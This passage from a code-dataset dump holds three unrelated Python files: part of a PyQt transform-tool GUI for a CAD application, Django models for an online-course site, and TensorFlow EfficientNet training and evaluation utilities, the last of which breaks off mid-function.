        grid0.addWidget(skew_title_label, 9, 0, 1, 2)

        self.skew_link_cb = FCCheckBox()
        self.skew_link_cb.setText(_("Link"))
        self.skew_link_cb.setToolTip(
            _("Link the Y entry to X entry and copy its content.")
        )
        grid0.addWidget(self.skew_link_cb, 9, 2)

        self.skewx_label = FCLabel('%s:' % _("X angle"))
        self.skewx_label.setToolTip(
            _("Angle for Skew action, in degrees.\n"
              "Float number between -360 and 360.")
        )
        self.skewx_entry = FCDoubleSpinner(callback=self.confirmation_message)
        # self.skewx_entry.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
        self.skewx_entry.set_precision(self.decimals)
        self.skewx_entry.set_range(-360, 360)
        self.skewx_button = FCButton(_("Skew X"))
        self.skewx_button.setToolTip(
            _("Skew/shear the selected object(s).\n"
              "The point of reference is the middle of\n"
              "the bounding box for all selected objects."))
        self.skewx_button.setMinimumWidth(90)
        grid0.addWidget(self.skewx_label, 10, 0)
        grid0.addWidget(self.skewx_entry, 10, 1)
        grid0.addWidget(self.skewx_button, 10, 2)

        self.skewy_label = FCLabel('%s:' % _("Y angle"))
        self.skewy_label.setToolTip(
            _("Angle for Skew action, in degrees.\n"
              "Float number between -360 and 360.")
        )
        self.skewy_entry = FCDoubleSpinner(callback=self.confirmation_message)
        # self.skewy_entry.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
        self.skewy_entry.set_precision(self.decimals)
        self.skewy_entry.set_range(-360, 360)
        self.skewy_button = FCButton(_("Skew Y"))
        self.skewy_button.setToolTip(
            _("Skew/shear the selected object(s).\n"
              "The point of reference is the middle of\n"
              "the bounding box for all selected objects."))
        self.skewy_button.setMinimumWidth(90)
        grid0.addWidget(self.skewy_label, 12, 0)
        grid0.addWidget(self.skewy_entry, 12, 1)
        grid0.addWidget(self.skewy_button, 12, 2)

        # when Link is checked, the Y widgets are disabled (X value is reused)
        self.ois_sk = OptionalInputSection(self.skew_link_cb, [self.skewy_label, self.skewy_entry, self.skewy_button],
                                           logic=False)

        separator_line = QtWidgets.QFrame()
        separator_line.setFrameShape(QtWidgets.QFrame.HLine)
        separator_line.setFrameShadow(QtWidgets.QFrame.Sunken)
        grid0.addWidget(separator_line, 14, 0, 1, 3)

        # ## Scale Title
        scale_title_label = FCLabel("<font size=3><b>%s</b></font>" % self.scaleName)
        grid0.addWidget(scale_title_label, 15, 0, 1, 2)

        self.scale_link_cb = FCCheckBox()
        self.scale_link_cb.setText(_("Link"))
        self.scale_link_cb.setToolTip(
            _("Link the Y entry to X entry and copy its content.")
        )
        grid0.addWidget(self.scale_link_cb, 15, 2)

        self.scalex_label = FCLabel('%s:' % _("X factor"))
        self.scalex_label.setToolTip(
            _("Factor for scaling on X axis.")
        )
        self.scalex_entry = FCDoubleSpinner(callback=self.confirmation_message)
        # self.scalex_entry.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
        self.scalex_entry.set_precision(self.decimals)
        self.scalex_entry.setMinimum(-1e6)
        self.scalex_button = FCButton(_("Scale X"))
        self.scalex_button.setToolTip(
            _("Scale the selected object(s).\n"
              "The point of reference depends on \n"
              "the Scale reference checkbox state."))
        self.scalex_button.setMinimumWidth(90)
        grid0.addWidget(self.scalex_label, 17, 0)
        grid0.addWidget(self.scalex_entry, 17, 1)
        grid0.addWidget(self.scalex_button, 17, 2)

        self.scaley_label = FCLabel('%s:' % _("Y factor"))
        self.scaley_label.setToolTip(
            _("Factor for scaling on Y axis.")
        )
        self.scaley_entry = FCDoubleSpinner(callback=self.confirmation_message)
        # self.scaley_entry.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
        self.scaley_entry.set_precision(self.decimals)
        self.scaley_entry.setMinimum(-1e6)
        self.scaley_button = FCButton(_("Scale Y"))
        self.scaley_button.setToolTip(
            _("Scale the selected object(s).\n"
              "The point of reference depends on \n"
              "the Scale reference checkbox state."))
        self.scaley_button.setMinimumWidth(90)
        grid0.addWidget(self.scaley_label, 19, 0)
        grid0.addWidget(self.scaley_entry, 19, 1)
        grid0.addWidget(self.scaley_button, 19, 2)

        self.ois_s = OptionalInputSection(self.scale_link_cb,
                                          [
                                              self.scaley_label,
                                              self.scaley_entry,
                                              self.scaley_button
                                          ], logic=False)

        separator_line = QtWidgets.QFrame()
        separator_line.setFrameShape(QtWidgets.QFrame.HLine)
        separator_line.setFrameShadow(QtWidgets.QFrame.Sunken)
        grid0.addWidget(separator_line, 21, 0, 1, 3)

        # ## Flip Title
        flip_title_label = FCLabel("<font size=3><b>%s</b></font>" % self.flipName)
        grid0.addWidget(flip_title_label, 23, 0, 1, 3)

        self.flipx_button = FCButton(_("Flip on X"))
        self.flipx_button.setToolTip(
            _("Flip the selected object(s) over the X axis.")
        )

        self.flipy_button = FCButton(_("Flip on Y"))
        # FIX: tooltip previously said "over the X axis" (copy/paste error)
        self.flipy_button.setToolTip(
            _("Flip the selected object(s) over the Y axis.")
        )

        hlay0 = QtWidgets.QHBoxLayout()
        grid0.addLayout(hlay0, 25, 0, 1, 3)
        hlay0.addWidget(self.flipx_button)
        hlay0.addWidget(self.flipy_button)

        separator_line = QtWidgets.QFrame()
        separator_line.setFrameShape(QtWidgets.QFrame.HLine)
        separator_line.setFrameShadow(QtWidgets.QFrame.Sunken)
        grid0.addWidget(separator_line, 27, 0, 1, 3)

        # ## Offset Title
        offset_title_label = FCLabel("<font size=3><b>%s</b></font>" % self.offsetName)
        grid0.addWidget(offset_title_label, 29, 0, 1, 3)

        self.offx_label = FCLabel('%s:' % _("X val"))
        self.offx_label.setToolTip(
            _("Distance to offset on X axis. In current units.")
        )
        self.offx_entry = FCDoubleSpinner(callback=self.confirmation_message)
        # self.offx_entry.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
        self.offx_entry.set_precision(self.decimals)
        self.offx_entry.setMinimum(-1e6)
        self.offx_button = FCButton(_("Offset X"))
        self.offx_button.setToolTip(
            _("Offset the selected object(s).\n"
              "The point of reference is the middle of\n"
              "the bounding box for all selected objects.\n"))
        self.offx_button.setMinimumWidth(90)
        grid0.addWidget(self.offx_label, 31, 0)
        grid0.addWidget(self.offx_entry, 31, 1)
        grid0.addWidget(self.offx_button, 31, 2)

        self.offy_label = FCLabel('%s:' % _("Y val"))
        self.offy_label.setToolTip(
            _("Distance to offset on Y axis. In current units.")
        )
        self.offy_entry = FCDoubleSpinner(callback=self.confirmation_message)
        # self.offy_entry.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
        self.offy_entry.set_precision(self.decimals)
        self.offy_entry.setMinimum(-1e6)
        self.offy_button = FCButton(_("Offset Y"))
        self.offy_button.setToolTip(
            _("Offset the selected object(s).\n"
              "The point of reference is the middle of\n"
              "the bounding box for all selected objects.\n"))
        self.offy_button.setMinimumWidth(90)
        grid0.addWidget(self.offy_label, 32, 0)
        grid0.addWidget(self.offy_entry, 32, 1)
        grid0.addWidget(self.offy_button, 32, 2)

        separator_line = QtWidgets.QFrame()
        separator_line.setFrameShape(QtWidgets.QFrame.HLine)
        separator_line.setFrameShadow(QtWidgets.QFrame.Sunken)
        grid0.addWidget(separator_line, 34, 0, 1, 3)

        # ## Buffer Title
        buffer_title_label = FCLabel("<font size=3><b>%s</b></font>" % self.bufferName)
        grid0.addWidget(buffer_title_label, 35, 0, 1, 2)

        self.buffer_rounded_cb = FCCheckBox('%s' % _("Rounded"))
        self.buffer_rounded_cb.setToolTip(
            _("If checked then the buffer will surround the buffered shape,\n"
              "every corner will be rounded.\n"
              "If not checked then the buffer will follow the exact geometry\n"
              "of the buffered shape.")
        )
        grid0.addWidget(self.buffer_rounded_cb, 35, 2)

        self.buffer_label = FCLabel('%s:' % _("Distance"))
        self.buffer_label.setToolTip(
            _("A positive value will create the effect of dilation,\n"
              "while a negative value will create the effect of erosion.\n"
              "Each geometry element of the object will be increased\n"
              "or decreased with the 'distance'.")
        )
        self.buffer_entry = FCDoubleSpinner(callback=self.confirmation_message)
        self.buffer_entry.set_precision(self.decimals)
        self.buffer_entry.setSingleStep(0.1)
        self.buffer_entry.setWrapping(True)
        self.buffer_entry.set_range(-10000.0000, 10000.0000)

        self.buffer_button = FCButton(_("Buffer D"))
        self.buffer_button.setToolTip(
            _("Create the buffer effect on each geometry,\n"
              "element from the selected object, using the distance.")
        )
        self.buffer_button.setMinimumWidth(90)
        grid0.addWidget(self.buffer_label, 37, 0)
        grid0.addWidget(self.buffer_entry, 37, 1)
        grid0.addWidget(self.buffer_button, 37, 2)

        self.buffer_factor_label = FCLabel('%s:' % _("Value"))
        self.buffer_factor_label.setToolTip(
            _("A positive value will create the effect of dilation,\n"
              "while a negative value will create the effect of erosion.\n"
              "Each geometry element of the object will be increased\n"
              "or decreased to fit the 'Value'. Value is a percentage\n"
              "of the initial dimension.")
        )
        self.buffer_factor_entry = FCDoubleSpinner(callback=self.confirmation_message, suffix='%')
        self.buffer_factor_entry.set_range(-100.0000, 1000.0000)
        self.buffer_factor_entry.set_precision(self.decimals)
        self.buffer_factor_entry.setWrapping(True)
        self.buffer_factor_entry.setSingleStep(1)

        self.buffer_factor_button = FCButton(_("Buffer F"))
        self.buffer_factor_button.setToolTip(
            _("Create the buffer effect on each geometry,\n"
              "element from the selected object, using the factor.")
        )
        self.buffer_factor_button.setMinimumWidth(90)
        grid0.addWidget(self.buffer_factor_label, 38, 0)
        grid0.addWidget(self.buffer_factor_entry, 38, 1)
        grid0.addWidget(self.buffer_factor_button, 38, 2)

        grid0.addWidget(FCLabel(''), 42, 0, 1, 3)

        self.layout.addStretch()

        # ## Reset Tool
        self.reset_button = FCButton(_("Reset Tool"))
        self.reset_button.setIcon(QtGui.QIcon(self.app.resource_location + '/reset32.png'))
        self.reset_button.setToolTip(
            _("Will reset the tool parameters.")
        )
        self.reset_button.setStyleSheet("""
                                        QPushButton
                                        {
                                            font-weight: bold;
                                        }
                                        """)
        self.layout.addWidget(self.reset_button)

        # #################################### FINISHED GUI ###########################
        # #############################################################################

    def on_reference_changed(self, index):
        """Show only the widgets relevant to the chosen reference kind."""
        if index == 0 or index == 1:  # "Origin" or "Selection" reference
            self.point_label.hide()
            self.point_entry.hide()
            self.point_button.hide()
            self.type_object_label.hide()
            self.type_obj_combo.hide()
            self.object_combo.hide()
        elif index == 2:  # "Point" reference
            self.point_label.show()
            self.point_entry.show()
            self.point_button.show()
            self.type_object_label.hide()
            self.type_obj_combo.hide()
            self.object_combo.hide()
        else:  # "Object" reference
            self.point_label.hide()
            self.point_entry.hide()
            self.point_button.hide()
            self.type_object_label.show()
            self.type_obj_combo.show()
            self.object_combo.show()

    def confirmation_message(self, accepted, minval, maxval):
        """Status-bar feedback used as spinner callback for float entries."""
        if accepted is False:
            self.app.inform[str, bool].emit('[WARNING_NOTCL] %s: [%.*f, %.*f]' % (_("Edited value is out of range"),
                                                                                  self.decimals,
                                                                                  minval,
                                                                                  self.decimals,
                                                                                  maxval), False)
        else:
            self.app.inform[str, bool].emit('[success] %s' % _("Edited value is within limits."), False)

    def confirmation_message_int(self, accepted, minval, maxval):
        """Status-bar feedback used as spinner callback for integer entries."""
        if accepted is False:
            self.app.inform[str, bool].emit('[WARNING_NOTCL] %s: [%d, %d]' %
                                            (_("Edited value is out of range"), minval, maxval), False)
        else:
            self.app.inform[str, bool].emit('[success] %s' % _("Edited value is within limits."), False)
| 42.599178 | 119 | 0.553958 |
5dda636f1aa861540b9631bc41688824b15dc263 | 2,704 | py | Python | simplemooc/courses/models.py | leorzz/simplemooc | 8b1c5e939d534b1fd729596df4c59fc69708b896 | [
"MIT"
] | null | null | null | simplemooc/courses/models.py | leorzz/simplemooc | 8b1c5e939d534b1fd729596df4c59fc69708b896 | [
"MIT"
] | null | null | null | simplemooc/courses/models.py | leorzz/simplemooc | 8b1c5e939d534b1fd729596df4c59fc69708b896 | [
"MIT"
] | null | null | null | # -*- coding: utf 8 -*-
from django.db import models
from django.conf import settings
# Custom manager
class CourseManager(models.Manager):
# Filtro do batabase
def search(self, query):
return self.get_queryset().filter(
#name__icontains=query, description__icontains=query # and
#models.Q(name__icontains=query) & models.Q(description__icontains=query) # end
models.Q(name__icontains=query) | models.Q(description__icontains=query) # or
)
# https://docs.djangoproject.com/en/1.11/ref/models/instances/
class Course(models.Model):
    """A course offered on the platform.

    Field labels (verbose names) are Portuguese user-facing strings and are
    kept untranslated because they appear in the admin UI.
    """
    name = models.CharField('Nome', max_length=100)
    slug = models.SlugField('Atalho')
    description = models.TextField('Descricao',blank=True)
    about = models.TextField('Sobre o curso', blank=True)
    start_date = models.DateField('Data de Início', null=True, blank=True)
    image = models.ImageField(upload_to='courses/images', verbose_name='Imagem', null=True, blank=True)
    created_at = models.DateTimeField('Criado em', auto_now_add=True)
    updated_at = models.DateTimeField('Atualizado em', auto_now=True)

    # custom manager with .search() support
    objects = CourseManager()

    # The __str__() method is called whenever you call str() on an object
    # Shows the course name instead of the default object repr.
    def __str__(self):
        return self.name

    # NOTE(review): @models.permalink is deprecated (removed in Django 2.1);
    # newer Django would use reverse() directly — confirm target version.
    @models.permalink
    def get_absolute_url(self):
        #from django.core.urlresolvers import reverse  # already included
        return ('courses:details', (), ({'slug': self.slug}))

    class Meta:
        verbose_name = 'Curso'
        verbose_name_plural = 'Cursos'
        ordering = ['name']  # ascending by name
        #ordering = ['-name']  # descending
class Enrollment(models.Model):
    """Link between a user and a course, carrying an approval status."""

    # status codes; labels are user-facing Portuguese strings
    STATUS_CHOICES = (
        (0, 'Pendente'),
        (1, 'Aprovado'),
        (2, 'Cancelado'),
    )

    user = models.ForeignKey(
        settings.AUTH_USER_MODEL, verbose_name='Usuário',
        related_name='enrollments'
    )
    course = models.ForeignKey(
        Course, verbose_name='Curso', related_name='enrollments'
    )
    # NOTE(review): default is 1 ('Aprovado'), not 0 ('Pendente') — confirm
    # enrollments are meant to be auto-approved.
    status = models.IntegerField('Situação', choices=STATUS_CHOICES, default=1, blank=True)
    created_at = models.DateTimeField('Criado em', auto_now_add=True)
    updated_at = models.DateTimeField('Atualizado em', auto_now=True)

    def active(self):
        # Mark the enrollment approved and persist it immediately.
        self.status = 1
        self.save()

    class Meta:
        verbose_name = 'Inscrição'
        verbose_name_plural = 'Inscrições'
        unique_together = (('user','course'),)  # only one enrollment per (user, course) pair
8bd389e140e7ad94a04704fe8a4c6d3a22ce8f70 | 15,467 | py | Python | libs/networks/efficientnet/utils.py | graceon/R3Det_Tensorflow | 5ff8e2505aacfb9107d2c41980374385dc0200ba | [
"MIT"
] | 3 | 2020-04-29T11:55:23.000Z | 2020-07-01T08:59:44.000Z | libs/networks/efficientnet/utils.py | graceon/R3Det_Tensorflow | 5ff8e2505aacfb9107d2c41980374385dc0200ba | [
"MIT"
] | 1 | 2021-02-06T15:50:57.000Z | 2021-02-06T15:50:57.000Z | libs/networks/efficientnet/utils.py | graceon/R3Det_Tensorflow | 5ff8e2505aacfb9107d2c41980374385dc0200ba | [
"MIT"
] | 1 | 2020-11-24T05:23:56.000Z | 2020-11-24T05:23:56.000Z | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
import sys
from absl import logging
import numpy as np
import tensorflow as tf
def build_learning_rate(initial_lr,
                        global_step,
                        steps_per_epoch=None,
                        lr_decay_type='exponential',
                        decay_factor=0.97,
                        decay_epochs=2.4,
                        total_steps=None,
                        warmup_epochs=5):
  """Build a learning-rate schedule with optional linear warmup.

  Args:
    initial_lr: float, peak learning rate reached after warmup.
    global_step: scalar int tensor, the current training step.
    steps_per_epoch: int, steps per epoch. Required for 'exponential' decay
      and for any schedule that uses warmup.
    lr_decay_type: one of 'exponential', 'cosine', 'constant'.
    decay_factor: exponential decay rate applied every `decay_epochs`.
    decay_epochs: number of epochs between exponential decay steps.
    total_steps: int, total training steps. Required for 'cosine'.
    warmup_epochs: epochs of linear warmup; 0/None disables warmup.

  Returns:
    A scalar learning-rate tensor (or plain float for 'constant' w/o warmup).

  Raises:
    ValueError: if `lr_decay_type` is not recognized.
  """
  if lr_decay_type == 'exponential':
    assert steps_per_epoch is not None
    decay_steps = steps_per_epoch * decay_epochs
    lr = tf.train.exponential_decay(
        initial_lr, global_step, decay_steps, decay_factor, staircase=True)
  elif lr_decay_type == 'cosine':
    assert total_steps is not None
    lr = 0.5 * initial_lr * (
        1 + tf.cos(np.pi * tf.cast(global_step, tf.float32) / total_steps))
  elif lr_decay_type == 'constant':
    lr = initial_lr
  else:
    # Was `assert False, ...`, which is silently stripped under `python -O`;
    # raising keeps the check in optimized runs too.
    raise ValueError('Unknown lr_decay_type : %s' % lr_decay_type)

  if warmup_epochs:
    # Warmup needs steps_per_epoch even for cosine/constant decay; without
    # this guard a None value crashed below with an unhelpful TypeError.
    assert steps_per_epoch is not None, 'warmup requires steps_per_epoch'
    logging.info('Learning rate warmup_epochs: %d', warmup_epochs)
    warmup_steps = int(warmup_epochs * steps_per_epoch)
    warmup_lr = (
        initial_lr * tf.cast(global_step, tf.float32) / tf.cast(
            warmup_steps, tf.float32))
    lr = tf.cond(global_step < warmup_steps, lambda: warmup_lr, lambda: lr)

  return lr
def build_optimizer(learning_rate,
                    optimizer_name='rmsprop',
                    decay=0.9,
                    epsilon=0.001,
                    momentum=0.9):
  """Build optimizer.

  Args:
    learning_rate: scalar tensor or float learning rate.
    optimizer_name: one of 'sgd', 'momentum', 'rmsprop'.
    decay: RMSProp discounting factor for the squared-gradient history.
    epsilon: RMSProp numerical-stability constant.
    momentum: momentum term for 'momentum' and 'rmsprop'.

  Returns:
    A tf.train Optimizer instance.

  Raises:
    ValueError: if `optimizer_name` is not recognized.
  """
  if optimizer_name == 'sgd':
    logging.info('Using SGD optimizer')
    optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
  elif optimizer_name == 'momentum':
    logging.info('Using Momentum optimizer')
    optimizer = tf.train.MomentumOptimizer(
        learning_rate=learning_rate, momentum=momentum)
  elif optimizer_name == 'rmsprop':
    logging.info('Using RMSProp optimizer')
    optimizer = tf.train.RMSPropOptimizer(learning_rate, decay, momentum,
                                          epsilon)
  else:
    # logging.fatal only logs; previously the function fell through and
    # crashed with UnboundLocalError on `optimizer`. Raise explicitly.
    raise ValueError('Unknown optimizer: %s' % optimizer_name)
  return optimizer
class TpuBatchNormalization(tf.layers.BatchNormalization):
  # class TpuBatchNormalization(tf.layers.BatchNormalization):
  """Cross replica batch normalization.

  Computes batch statistics averaged across TPU replica groups instead of
  per-core, which matters when per-core batch sizes are small.
  """

  def __init__(self, fused=False, **kwargs):
    # Fused batch norm cannot be combined with the custom cross-replica
    # moments computed in _moments below.
    if fused in (True, None):
      raise ValueError('TpuBatchNormalization does not support fused=True.')
    super(TpuBatchNormalization, self).__init__(fused=fused, **kwargs)

  def _cross_replica_average(self, t, num_shards_per_group):
    """Calculates the average value of input tensor across TPU replicas."""
    # NOTE(review): `tpu_function` is not among this module's visible
    # imports — confirm the import was not lost when the file was copied.
    num_shards = tpu_function.get_tpu_context().number_of_shards
    group_assignment = None
    if num_shards_per_group > 1:
      if num_shards % num_shards_per_group != 0:
        raise ValueError('num_shards: %d mod shards_per_group: %d, should be 0'
                         % (num_shards, num_shards_per_group))
      num_groups = num_shards // num_shards_per_group
      # Each group averages over a contiguous range of replica ids.
      group_assignment = [[
          x for x in range(num_shards) if x // num_shards_per_group == y
      ] for y in range(num_groups)]
    return tf.tpu.cross_replica_sum(t, group_assignment) / tf.cast(
        num_shards_per_group, t.dtype)

  def _moments(self, inputs, reduction_axes, keep_dims):
    """Compute the mean and variance: it overrides the original _moments."""
    shard_mean, shard_variance = super(TpuBatchNormalization, self)._moments(
        inputs, reduction_axes, keep_dims=keep_dims)

    num_shards = tpu_function.get_tpu_context().number_of_shards or 1
    if num_shards <= 8:  # Skip cross_replica for 2x2 or smaller slices.
      num_shards_per_group = 1
    else:
      num_shards_per_group = max(8, num_shards // 8)
    logging.info('TpuBatchNormalization with num_shards_per_group %s',
                 num_shards_per_group)
    if num_shards_per_group > 1:
      # Compute variance using: Var[X]= E[X^2] - E[X]^2.
      shard_square_of_mean = tf.math.square(shard_mean)
      shard_mean_of_square = shard_variance + shard_square_of_mean
      group_mean = self._cross_replica_average(
          shard_mean, num_shards_per_group)
      group_mean_of_square = self._cross_replica_average(
          shard_mean_of_square, num_shards_per_group)
      group_variance = group_mean_of_square - tf.math.square(group_mean)
      return (group_mean, group_variance)
    else:
      return (shard_mean, shard_variance)
class BatchNormalization(tf.layers.BatchNormalization):
  """Batch norm whose default variable scope matches TpuBatchNormalization.

  Using the same default name lets checkpoints trained with the TPU variant
  restore cleanly into this plain layer (and vice versa).
  """

  def __init__(self, name='tpu_batch_normalization', **kwargs):
    kwargs['name'] = name
    super(BatchNormalization, self).__init__(**kwargs)
def drop_connect(inputs, is_training, drop_connect_rate):
  """Randomly drop whole examples (stochastic depth) during training."""
  if not is_training:
    return inputs

  # Probability that an example survives.
  # TODO(tanmingxing): add support for training progress.
  survival_prob = 1.0 - drop_connect_rate

  # One uniform sample per example; floor() turns it into a 0/1 mask that
  # keeps each example with probability `survival_prob`.
  batch = tf.shape(inputs)[0]
  noise = survival_prob
  noise += tf.random_uniform([batch, 1, 1, 1], dtype=inputs.dtype)
  keep_mask = tf.floor(noise)

  # Scale survivors by 1/survival_prob so the output expectation matches
  # the input.
  return tf.div(inputs, survival_prob) * keep_mask
def archive_ckpt(ckpt_eval, ckpt_objective, ckpt_path):
  """Archive a checkpoint if the metric is better.

  Args:
    ckpt_eval: evaluation result written to best_eval.txt next to the archive.
    ckpt_objective: scalar objective; must beat the previously saved best.
    ckpt_path: path prefix of the checkpoint files to archive.

  Returns:
    True if the checkpoint was archived, False otherwise.
  """
  ckpt_dir, ckpt_name = os.path.split(ckpt_path)

  # The best objective so far is persisted alongside the checkpoints.
  saved_objective_path = os.path.join(ckpt_dir, 'best_objective.txt')
  saved_objective = float('-inf')
  if tf.gfile.Exists(saved_objective_path):
    with tf.gfile.GFile(saved_objective_path, 'r') as f:
      saved_objective = float(f.read())
  if saved_objective > ckpt_objective:
    logging.info('Ckpt %s is worse than %s', ckpt_objective, saved_objective)
    return False

  filenames = tf.gfile.Glob(ckpt_path + '.*')
  if filenames is None:
    logging.info('No files to copy for checkpoint %s', ckpt_path)
    return False

  # Clear the old folder.
  dst_dir = os.path.join(ckpt_dir, 'archive')
  if tf.gfile.Exists(dst_dir):
    tf.gfile.DeleteRecursively(dst_dir)
  tf.gfile.MakeDirs(dst_dir)

  # Write checkpoints.
  for f in filenames:
    dest = os.path.join(dst_dir, os.path.basename(f))
    tf.gfile.Copy(f, dest, overwrite=True)
  # Rewrite the CheckpointState proto so tf.train can discover the archive.
  ckpt_state = tf.train.generate_checkpoint_state_proto(
      dst_dir,
      model_checkpoint_path=ckpt_name,
      all_model_checkpoint_paths=[ckpt_name])
  with tf.gfile.GFile(os.path.join(dst_dir, 'checkpoint'), 'w') as f:
    f.write(str(ckpt_state))
  with tf.gfile.GFile(os.path.join(dst_dir, 'best_eval.txt'), 'w') as f:
    f.write('%s' % ckpt_eval)

  # Update the best objective.
  with tf.gfile.GFile(saved_objective_path, 'w') as f:
    f.write('%f' % ckpt_objective)

  logging.info('Copying checkpoint %s to %s', ckpt_path, dst_dir)
  return True
def get_ema_vars():
  """Get all exponential moving average (ema) variables."""
  candidates = tf.trainable_variables() + tf.get_collection('moving_vars')
  # Batch-norm moving statistics also carry an EMA shadow.
  candidates += [
      v for v in tf.global_variables()
      if 'moving_mean' in v.name or 'moving_variance' in v.name
  ]
  # Deduplicate: a variable can appear in more than one collection.
  return list(set(candidates))
class DepthwiseConv2D(tf.keras.layers.DepthwiseConv2D, tf.layers.Layer):
  """Wrap keras DepthwiseConv2D to tf.layers.

  The mixin makes the keras layer usable wherever a tf.layers.Layer is
  expected; no behavior is added.
  """
  pass
class EvalCkptDriver(object):
  """A driver for running eval inference.

  Attributes:
    model_name: str. Model name to eval.
    batch_size: int. Eval batch size.
    image_size: int. Input image size, determined by model name.
    num_classes: int. Number of classes, default to 1000 for ImageNet.
    include_background_label: whether to include extra background label.
  """

  def __init__(self,
               model_name,
               batch_size=1,
               image_size=224,
               num_classes=1000,
               include_background_label=False):
    """Initialize internal variables."""
    self.model_name = model_name
    self.batch_size = batch_size
    self.num_classes = num_classes
    self.include_background_label = include_background_label
    self.image_size = image_size

  def restore_model(self, sess, ckpt_dir, enable_ema=True, export_ckpt=None):
    """Restore variables from checkpoint dir."""
    sess.run(tf.global_variables_initializer())
    checkpoint = tf.train.latest_checkpoint(ckpt_dir)
    if enable_ema:
      # Decay 0.0 makes the shadow variables track the latest values, so
      # restoring them loads the EMA weights stored in the checkpoint.
      ema = tf.train.ExponentialMovingAverage(decay=0.0)
      ema_vars = get_ema_vars()
      var_dict = ema.variables_to_restore(ema_vars)
      ema_assign_op = ema.apply(ema_vars)
    else:
      var_dict = get_ema_vars()
      ema_assign_op = None

    tf.train.get_or_create_global_step()
    sess.run(tf.global_variables_initializer())
    saver = tf.train.Saver(var_dict, max_to_keep=1)
    saver.restore(sess, checkpoint)

    if export_ckpt:
      # Optionally re-export the (EMA-folded) weights as a plain checkpoint.
      if ema_assign_op is not None:
        sess.run(ema_assign_op)
      saver = tf.train.Saver(max_to_keep=1, save_relative_paths=True)
      saver.save(sess, export_ckpt)

  def build_model(self, features, is_training):
    """Build model with input features. Must be overridden by subclasses."""
    del features, is_training
    raise ValueError('Must be implemented by subclasses.')

  def get_preprocess_fn(self):
    # Subclasses return the image preprocessing function to apply.
    raise ValueError('Must be implemented by subclsses.')

  def build_dataset(self, filenames, labels, is_training):
    """Build input dataset returning one (images, labels) batch tensor pair."""
    batch_drop_remainder = False
    if 'condconv' in self.model_name and not is_training:
      # CondConv layers can only be called with known batch dimension. Thus, we
      # must drop all remaining examples that do not make up one full batch.
      # To ensure all examples are evaluated, use a batch size that evenly
      # divides the number of files.
      batch_drop_remainder = True
      num_files = len(filenames)
      if num_files % self.batch_size != 0:
        tf.logging.warn('Remaining examples in last batch are not being '
                        'evaluated.')
    filenames = tf.constant(filenames)
    labels = tf.constant(labels)
    dataset = tf.data.Dataset.from_tensor_slices((filenames, labels))

    def _parse_function(filename, label):
      # Read, preprocess and cast a single image file.
      image_string = tf.read_file(filename)
      preprocess_fn = self.get_preprocess_fn()
      image_decoded = preprocess_fn(
          image_string, is_training, image_size=self.image_size)
      image = tf.cast(image_decoded, tf.float32)
      return image, label

    dataset = dataset.map(_parse_function)
    dataset = dataset.batch(self.batch_size,
                            drop_remainder=batch_drop_remainder)

    iterator = dataset.make_one_shot_iterator()
    images, labels = iterator.get_next()
    return images, labels

  def run_inference(self,
                    ckpt_dir,
                    image_files,
                    labels,
                    enable_ema=True,
                    export_ckpt=None):
    """Build and run inference on the target images and labels."""
    # With a background label, class index 0 is background and real labels
    # are shifted by one.
    label_offset = 1 if self.include_background_label else 0
    with tf.Graph().as_default(), tf.Session() as sess:
      images, labels = self.build_dataset(image_files, labels, False)
      probs = self.build_model(images, is_training=False)
      if isinstance(probs, tuple):
        probs = probs[0]

      self.restore_model(sess, ckpt_dir, enable_ema, export_ckpt)

      prediction_idx = []
      prediction_prob = []
      for _ in range(len(image_files) // self.batch_size):
        out_probs = sess.run(probs)
        # Sort class probabilities descending and keep the top five.
        idx = np.argsort(out_probs)[::-1]
        prediction_idx.append(idx[:5] - label_offset)
        prediction_prob.append([out_probs[pid] for pid in idx[:5]])

    # Return the top 5 predictions (idx and prob) for each image.
    return prediction_idx, prediction_prob

  def eval_example_images(self,
                          ckpt_dir,
                          image_files,
                          labels_map_file,
                          enable_ema=True,
                          export_ckpt=None):
    """Eval a list of example images.

    Args:
      ckpt_dir: str. Checkpoint directory path.
      image_files: List[str]. A list of image file paths.
      labels_map_file: str. The labels map file path.
      enable_ema: enable expotential moving average.
      export_ckpt: export ckpt folder.

    Returns:
      A tuple (pred_idx, and pred_prob), where pred_idx is the top 5 prediction
      index and pred_prob is the top 5 prediction probability.
    """
    classes = json.loads(tf.gfile.Open(labels_map_file).read())
    pred_idx, pred_prob = self.run_inference(
        ckpt_dir, image_files, [0] * len(image_files), enable_ema, export_ckpt)
    for i in range(len(image_files)):
      print('predicted class for image {}: '.format(image_files[i]))
      for j, idx in enumerate(pred_idx[i]):
        print(' -> top_{} ({:4.2f}%): {} '.format(j, pred_prob[i][j] * 100,
                                                  classes[str(idx)]))
    return pred_idx, pred_prob

  def eval_imagenet(self, ckpt_dir, imagenet_eval_glob,
                    imagenet_eval_label, num_images, enable_ema, export_ckpt):
    """Eval ImageNet images and report top1/top5 accuracy.

    Args:
      ckpt_dir: str. Checkpoint directory path.
      imagenet_eval_glob: str. File path glob for all eval images.
      imagenet_eval_label: str. File path for eval label.
      num_images: int. Number of images to eval: -1 means eval the whole
        dataset.
      enable_ema: enable expotential moving average.
      export_ckpt: export checkpoint folder.

    Returns:
      A tuple (top1, top5) for top1 and top5 accuracy.
    """
    imagenet_val_labels = [int(i) for i in tf.gfile.GFile(imagenet_eval_label)]
    imagenet_filenames = sorted(tf.gfile.Glob(imagenet_eval_glob))
    if num_images < 0:
      num_images = len(imagenet_filenames)
    image_files = imagenet_filenames[:num_images]
    labels = imagenet_val_labels[:num_images]

